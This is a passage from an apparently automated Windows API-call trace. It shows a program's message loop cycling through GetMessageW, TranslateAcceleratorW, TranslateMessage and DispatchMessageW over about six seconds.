hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.352] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.352] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.353] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.399] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.399] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.399] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.399] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.399] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.399] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.399] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.400] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0047.446] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0047.446] TranslateMessage (lpMsg=0x18e548) returned 0 [0047.446] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0047.446] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0048.881] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0048.881] TranslateMessage (lpMsg=0x18e548) returned 0 [0048.881] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0048.881] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0048.928] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0048.928] TranslateMessage (lpMsg=0x18e548) returned 0 [0048.928] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0048.928] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0048.928] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0048.928] TranslateMessage (lpMsg=0x18e548) returned 0 [0048.928] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0048.929] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0048.974] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0048.974] TranslateMessage (lpMsg=0x18e548) returned 0 [0048.974] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0048.974] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0048.974] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0048.974] TranslateMessage (lpMsg=0x18e548) returned 0 [0048.975] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0048.975] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.021] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.021] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.021] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.021] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.021] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.021] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.021] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.022] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.068] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.068] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.068] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.068] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.068] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.068] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.068] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.069] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.120] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.120] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.120] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.120] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.120] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.120] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.120] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.121] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.162] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.162] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.162] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.162] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.162] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.162] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.162] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.163] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.208] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.208] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.208] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.208] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.208] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.208] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.208] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.209] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.255] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.255] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.255] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.255] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.255] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.255] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.255] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.256] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.302] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.302] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.302] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.302] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.302] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.302] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.302] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.303] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.349] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.349] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.349] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.349] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.349] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.349] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.349] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.350] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.396] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.396] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.396] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.396] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.396] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.396] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.396] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.397] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.445] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.445] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.445] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.445] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.445] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.445] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.445] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.446] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0049.489] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0049.489] TranslateMessage (lpMsg=0x18e548) returned 0 [0049.489] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0049.489] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.468] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.468] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.469] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.469] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.503] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.503] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.504] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.504] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.504] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.504] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.504] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.505] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.552] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.552] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.552] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.552] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.552] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.552] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.552] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.553] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.597] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.597] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.597] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.597] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.597] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.597] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.597] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.598] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.644] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.644] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.644] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.644] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.644] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.644] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.644] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.645] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.691] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.691] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.691] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.691] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.691] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.691] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.691] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.692] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.737] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.737] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.737] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.737] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.738] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.738] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.738] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.738] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.784] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.784] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.784] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.784] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.784] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.784] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.784] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.785] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.831] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.831] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.831] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.831] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.831] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.831] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.831] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.832] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.879] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.879] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.879] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.879] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.879] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.879] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.879] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.880] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.930] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.930] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.930] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.930] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0050.930] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0050.930] TranslateMessage (lpMsg=0x18e548) returned 0 [0050.930] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0050.931] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0051.018] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0051.018] TranslateMessage (lpMsg=0x18e548) returned 0 [0051.018] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0051.018] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0051.018] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0051.018] TranslateMessage (lpMsg=0x18e548) returned 0 [0051.018] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0051.019] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0051.065] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0051.065] TranslateMessage (lpMsg=0x18e548) returned 0 [0051.065] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0051.065] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0051.065] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0051.065] TranslateMessage (lpMsg=0x18e548) returned 0 [0051.065] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0051.066] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0051.112] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0051.112] TranslateMessage (lpMsg=0x18e548) returned 0 [0051.112] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0051.112] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0052.079] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0052.079] TranslateMessage (lpMsg=0x18e548) returned 0 [0052.079] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0052.079] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.374] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.374] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.374] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.374] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.374] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.374] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.374] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.375] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.420] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.421] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.421] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.421] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.421] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.421] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.421] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.422] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.467] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.467] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.467] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.467] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.467] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.467] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.467] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.468] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.514] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.514] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.514] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.514] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.514] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.514] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.514] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.515] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.561] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.561] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.561] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.561] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.561] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.561] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.561] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.562] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.608] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.608] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.608] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.608] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.608] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.608] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.608] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.609] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.655] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.655] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.655] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.655] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.655] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.655] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.655] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.656] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.701] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.701] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.701] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.701] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.701] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.701] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.701] DispatchMessageW (lpMsg=0x18e548) returned 0x0 